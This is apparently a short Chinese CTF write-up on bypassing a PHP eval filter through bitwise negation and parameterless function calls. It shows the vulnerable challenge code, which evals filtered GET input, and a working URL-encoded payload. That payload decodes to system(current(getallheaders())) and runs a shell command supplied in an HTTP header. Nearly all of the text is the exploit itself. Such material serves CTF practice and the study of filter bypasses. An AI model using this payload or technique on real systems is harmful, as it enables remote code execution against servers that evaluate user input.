取反配合无参命令执行
<?php
show_source(__FILE__);
$code = $_GET['code'];
if(strlen($code) > 80 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/is',$code)){
die(' Hello');
}else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
@eval($code);
}
?>
payload:
[~%8c%86%8c%8b%9a%92][!%FF]([~%9C%8A%8D%8D%9A%91%8B][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]()));
payload原型为:
system(current(getallheaders()));利用二维数组进行拼接需要[!%FF]分割